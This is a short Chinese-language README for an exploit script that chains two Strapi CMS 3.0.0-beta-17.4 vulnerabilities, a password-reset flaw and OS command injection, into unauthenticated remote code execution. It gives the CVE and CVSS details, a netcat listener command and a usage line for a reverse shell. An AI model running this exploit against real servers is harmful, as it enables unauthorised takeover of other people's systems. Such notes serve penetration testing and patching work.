该漏洞利用针对 Strapi CMS 框架 3.0.0-beta-17.4 版本中的两个漏洞,允许未经身份验证的远程代码执行(RCE)。
弱密码恢复机制导致忘记密码
CVSS: 9.8 - 严重
更多详情: https://nvd.nist.gov/vuln/detail/CVE-2019-18818
未正确中和 OS 命令中的特殊元素('OS 命令注入')
CVSS: 7.2 - 高危
更多详情: https://nvd.nist.gov/vuln/detail/CVE-2019-19609
在运行此漏洞利用之前,请在你下面选项中指定的 lport 上启动一个 netcat 监听器。
nc -lnvp <lport>
exploit.py <rhost> <lhost> <lport>